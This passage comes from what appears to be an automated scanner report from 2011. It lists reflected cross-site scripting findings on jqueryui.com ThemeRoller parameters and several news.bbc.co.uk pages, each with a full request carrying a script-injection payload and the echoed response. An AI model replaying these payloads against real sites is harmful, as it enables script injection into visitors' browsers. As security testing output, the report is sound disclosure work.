Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305be49"><script>alert(1)</script>a6f58046687&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54d46"><script>alert(1)</script>95af9515bdf was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3054d46"><script>alert(1)</script>95af9515bdf&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.71. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1420"><script>alert(1)</script>4061fcc75d1 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxe1420"><script>alert(1)</script>4061fcc75d1&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.72. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3913a'-alert(1)-'50c36c6e4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:28 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:28 GMT
Connection: close
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955568000,
       editionToServe: 'international',
       queryString: '3913a'-alert(1)-'50c36c6e4b3=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.73. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be63'-alert(1)-'34341b078d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm?6be63'-alert(1)-'34341b078d2=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:14 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:14 GMT
Connection: close
Content-Length: 66244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955614000,
       editionToServe: 'international',
       queryString: '6be63'-alert(1)-'34341b078d2=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.74. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8b7'-alert(1)-'8f07b21810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm?de8b7'-alert(1)-'8f07b21810e=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=781
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 57158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'de8b7'-alert(1)-'8f07b21810e=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.75. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff46'-alert(1)-'6db5909d807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm?6ff46'-alert(1)-'6db5909d807=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:47 GMT
Keep-Alive: timeout=5, max=778
Expires: Mon, 18 Jul 2011 02:19:47 GMT
Connection: close
Content-Length: 50930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955587000,
       editionToServe: 'international',
       queryString: '6ff46'-alert(1)-'6db5909d807=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.76. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f63'-alert(1)-'818a96bc794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm?f1f63'-alert(1)-'818a96bc794=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:48 GMT
Keep-Alive: timeout=5, max=707
Expires: Mon, 18 Jul 2011 02:19:48 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955588000,
       editionToServe: 'international',
       queryString: 'f1f63'-alert(1)-'818a96bc794=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.77. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb38'-alert(1)-'e4c57ec748a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm?8bb38'-alert(1)-'e4c57ec748a=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:53 GMT
Keep-Alive: timeout=5, max=788
Expires: Mon, 18 Jul 2011 02:19:53 GMT
Connection: close
Content-Length: 53436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955593000,
       editionToServe: 'international',
       queryString: '8bb38'-alert(1)-'e4c57ec748a=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.78. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afea3'-alert(1)-'0f35a49d629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm?afea3'-alert(1)-'0f35a49d629=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=761
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'afea3'-alert(1)-'0f35a49d629=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.79. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5709f'-alert(1)-'96343706a0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm?5709f'-alert(1)-'96343706a0b=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:34 GMT
Keep-Alive: timeout=5, max=793
Expires: Mon, 18 Jul 2011 02:20:34 GMT
Connection: close
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955634000,
       editionToServe: 'international',
       queryString: '5709f'-alert(1)-'96343706a0b=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.80. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3339d'-alert(1)-'a2a06505956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm?3339d'-alert(1)-'a2a06505956=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:41 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:19:41 GMT
Connection: close
Content-Length: 51951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955581000,
       editionToServe: 'international',
       queryString: '3339d'-alert(1)-'a2a06505956=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.81. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d9'-alert(1)-'2c218cf9b1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm?5b3d9'-alert(1)-'2c218cf9b1c=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:08 GMT
Keep-Alive: timeout=5, max=741
Expires: Mon, 18 Jul 2011 02:20:08 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955608000,
       editionToServe: 'international',
       queryString: '5b3d9'-alert(1)-'2c218cf9b1c=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.82. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0774'-alert(1)-'96258bdb8b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm?b0774'-alert(1)-'96258bdb8b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:11 GMT
Keep-Alive: timeout=5, max=799
Expires: Mon, 18 Jul 2011 02:20:11 GMT
Connection: close
Content-Length: 53360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955611000,
       editionToServe: 'international',
       queryString: 'b0774'-alert(1)-'96258bdb8b3=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.83. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3db0'-alert(1)-'d49f53f3de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm?b3db0'-alert(1)-'d49f53f3de4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
